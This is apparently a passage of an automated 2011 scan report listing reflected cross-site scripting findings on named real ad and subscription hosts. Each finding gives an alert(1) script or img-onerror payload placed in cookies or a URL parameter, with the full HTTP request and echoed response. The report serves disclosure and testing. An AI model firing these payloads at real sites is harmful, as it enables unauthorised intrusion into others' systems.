Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p63514475 cookie is copied into the HTML document as plain text between tags. The payload ba097<script>alert(1)</script>15820b863ab was submitted in the ar_p63514475 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054949&AR_C=43921375 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://assets2.rubiconproject.com/static/intermarkets/x3006c1_300x250.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&ba097<script>alert(1)</script>15820b863ab; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; ar_p119936314=exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&; ar_p120927104=exp=1&initExp=Mon Oct 3 16:32:52 2011&recExp=Mon Oct 3 16:32:52 2011&prad=1425782&arc=1524313&; ar_p117672109=exp=1&initExp=Tue Oct 4 18:40:11 2011&recExp=Tue Oct 4 18:40:11 2011&prad=3109717&arc=6523339&; UID=9cc29993-80.67.74.150-1314836282; UIDR=1317753620

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:34:53 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=29&initExp=Sun Oct 2 23:59:13 2011&recExp=Wed Oct 5 14:34:53 2011&fa24ecc815e7f10ac27afd7e=&fa24ecc8d371cc1209e0420f=1&prad=71054949&arc=43921375&; expires=Tue 03-Jan-2012 14:34:53 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27501

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054949",Pid:"p119936314",Arc:"43921375",Location:C
...[SNIP]...
3:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&', "ar_p63514475": 'exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&ba097<script>alert(1)</script>15820b863ab' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "www.Doralinks.com|www.PetNamesWorld.com|www.BigGreenHelp.com|www.HotelForDogsMovie.com|www.MundoNick.com|www.iCarly.com|www.MundoBob.com|www
...[SNIP]...

2.74. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload cc7b2<script>alert(1)</script>a2719cdcbe9 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054949&AR_C=43921375 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://assets2.rubiconproject.com/static/intermarkets/x3006c1_300x250.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&cc7b2<script>alert(1)</script>a2719cdcbe9; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; ar_p119936314=exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&; ar_p120927104=exp=1&initExp=Mon Oct 3 16:32:52 2011&recExp=Mon Oct 3 16:32:52 2011&prad=1425782&arc=1524313&; ar_p117672109=exp=1&initExp=Tue Oct 4 18:40:11 2011&recExp=Tue Oct 4 18:40:11 2011&prad=3109717&arc=6523339&; UID=9cc29993-80.67.74.150-1314836282; UIDR=1317753620

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:34:53 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=25&initExp=Sun Oct 2 23:59:13 2011&recExp=Wed Oct 5 14:34:53 2011&fa24ecc815e7f10ac27afd7e=&fa24ecc8d371cc1209e0420f=1&prad=71054949&arc=43921375&; expires=Tue 03-Jan-2012 14:34:53 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27501

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054949",Pid:"p119936314",Arc:"43921375",Location:C
...[SNIP]...
011&prad=71054949&arc=43921375&', "BMX_3PC": '1', "UIDR": '1317753620', "ar_p81479006": 'exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&cc7b2<script>alert(1)</script>a2719cdcbe9', "ar_p63514475": 'exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "www.Doralinks.com|w
...[SNIP]...

2.75. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload a288b<script>alert(1)</script>a416727e360 was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054949&AR_C=43921375 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://assets2.rubiconproject.com/static/intermarkets/x3006c1_300x250.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&a288b<script>alert(1)</script>a416727e360; ar_p119936314=exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&; ar_p120927104=exp=1&initExp=Mon Oct 3 16:32:52 2011&recExp=Mon Oct 3 16:32:52 2011&prad=1425782&arc=1524313&; ar_p117672109=exp=1&initExp=Tue Oct 4 18:40:11 2011&recExp=Tue Oct 4 18:40:11 2011&prad=3109717&arc=6523339&; UID=9cc29993-80.67.74.150-1314836282; UIDR=1317753620

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:34:55 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=35&initExp=Sun Oct 2 23:59:13 2011&recExp=Wed Oct 5 14:34:55 2011&fa24ecc815e7f10ac27afd7e=&fa24ecc8d371cc1209e0420f=1&prad=71054949&arc=43921375&; expires=Tue 03-Jan-2012 14:34:55 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27501

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054949",Pid:"p119936314",Arc:"43921375",Location:C
...[SNIP]...
t Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&', "ar_p82806590": 'exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&a288b<script>alert(1)</script>a416727e360', "ar_p110620504": 'exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1317825169%2E084%2Cwait%2D%3E10000%2C'
...[SNIP]...

2.76. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload f125c<script>alert(1)</script>7f96a50e532 was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054949&AR_C=43921375 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://assets2.rubiconproject.com/static/intermarkets/x3006c1_300x250.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&f125c<script>alert(1)</script>7f96a50e532; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; ar_p119936314=exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&; ar_p120927104=exp=1&initExp=Mon Oct 3 16:32:52 2011&recExp=Mon Oct 3 16:32:52 2011&prad=1425782&arc=1524313&; ar_p117672109=exp=1&initExp=Tue Oct 4 18:40:11 2011&recExp=Tue Oct 4 18:40:11 2011&prad=3109717&arc=6523339&; UID=9cc29993-80.67.74.150-1314836282; UIDR=1317753620

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:34:52 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=23&initExp=Sun Oct 2 23:59:13 2011&recExp=Wed Oct 5 14:34:52 2011&fa24ecc815e7f10ac27afd7e=&fa24ecc8d371cc1209e0420f=1&prad=71054949&arc=43921375&; expires=Tue 03-Jan-2012 14:34:52 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27501

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054949",Pid:"p119936314",Arc:"43921375",Location:C
...[SNIP]...
9d8e874": 'method%2D%3E%2D1%2Cts%2D%3E1317825169%2E084%2Cwait%2D%3E10000%2C', "ar_p90175839": 'exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&f125c<script>alert(1)</script>7f96a50e532', "ar_p119936314fa24ecc816ce37421b89f501": 'exp=1&initExp=Wed Oct 5 14:34:43 2011&recExp=Wed Oct 5 14:34:43 2011&prad=71054949&arc=43921375&', "UID": '9cc29993-80.67.74.150-1314836282', "ar_fa24e
...[SNIP]...

2.77. http://rma-api.gravity.com/v1/beacons/initialize [vaguid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rma-api.gravity.com
Path:   /v1/beacons/initialize

Issue detail

The value of the vaguid cookie is copied into the HTML document as plain text between tags. The payload 7f117<script>alert(1)</script>b894dfbbedb was submitted in the vaguid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /v1/beacons/initialize?u=undefined&sg=e8fd47ffdc2b5a28d10f29d4dfdf8fb9 HTTP/1.1
Host: rma-api.gravity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.time.com/time/world/article/0,8599,2096010,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vaguid=172d38ad2d9b9b5aa42030c637b398397f117<script>alert(1)</script>b894dfbbedb

Response

HTTP/1.1 200 OK
Server: ""
P3P: CP="NOI DSP COR ADMa OUR NOR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 111
Date: Wed, 05 Oct 2011 14:19:50 GMT
Connection: close
Set-Cookie: vaguid=172d38ad2d9b9b5aa42030c637b398397f117<script>alert(1)</script>b894dfbbedb; Domain=.gravity.com; Expires=Sat, 07-Jul-2063 04:39:40 GMT; Path=/

GravityInsights.cc('grvinsights', '172d38ad2d9b9b5aa42030c637b398397f117<script>alert(1)</script>b894dfbbedb');

2.78. https://secure.customersvc.com/servlet/Show [MSRSMAG parameter]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.customersvc.com
Path:   /servlet/Show

Issue detail

The value of the MSRSMAG request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b831"><img%20src%3da%20onerror%3dalert(1)>ecdb6b6b8bb was submitted in the MSRSMAG parameter. This input was echoed as 8b831"><img src=a onerror=alert(1)>ecdb6b6b8bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /servlet/Show?WESPAGE=am/Services/load_email.jsp&MSRSMAG=TD8b831"><img%20src%3da%20onerror%3dalert(1)>ecdb6b6b8bb HTTP/1.1
Host: secure.customersvc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://subscription.timeinc.com/storefront/privacy/time/generic_privacy_new.html?dnp-source=E
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Document follows
Location: http://secure.customersvc.com/servlet/Show?WESPAGE=am/home.jsp&MSRSMAG=TD8B831"><IMG SRC=A ONERROR=ALERT(1)>ECDB6B6B8BB
Connection: keep-alive
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 386
Last-Modified: Wed, 05 Oct 2011 14:57:07 GMT
Content-Language: en-US
Date: Wed, 05 Oct 2011 14:57:07 GMT
Server: WebSphere Application Server/7.0

IMW0253E <HTML><HEAD><TITLE>Redirection</TITLE></HEAD><BODY>This document can be found <A HREF="http://secure.customersvc.com/servlet/Show?WESPAGE=am/home.jsp&MSRSMAG=TD8B831"><IMG SRC=A ONERROR=ALERT(1)>ECDB6B6B8BB">
...[SNIP]...

Report generated by XSS.CX at Wed Oct 05 10:00:13 CDT 2011.